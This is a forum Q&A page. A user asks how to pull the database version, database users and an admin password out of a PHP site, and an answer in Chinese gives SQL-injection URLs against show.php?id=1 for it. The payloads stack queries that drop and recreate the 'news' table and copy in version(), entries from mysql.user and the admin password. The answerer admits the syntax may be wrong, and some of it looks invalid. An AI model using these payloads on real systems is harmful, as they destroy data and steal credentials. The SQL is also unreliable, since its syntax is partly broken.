- Gemeinschaft
- Lernen
- Tools-Bibliothek
- Freizeit
Heim > Fragen und Antworten > Hauptteil
Es gibt so einen PHP-Code
Bitte erklären Sie mir, wie ich mit dem Skript die Datenbankversion, den Datenbankbenutzer und den Passwortinhalt mit Feld 1 abfragen kann
習慣沉默2017-06-13 09:23:39
你意会吧,如果是我的话我可能会试一下这么做。。。
sql注入只了解一些简单的原理来着。。。
sql语法我都忘光了。。。语法不对的部分你自己查一下语法改下吧。。。
# 获得数据库版本
show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1);
show.php?id=1
# 获取数据库用户
show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news;
show.php?id=1
# 获取表admin ID为1字段password的内容
show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news;
show.php?id=1额对了。。一般还是别做得这么绝。。。
rename一下原来的news,所有的信息都查完之后把没用的news删掉再rename回去吧。。。但是rename语句我忘掉了。。。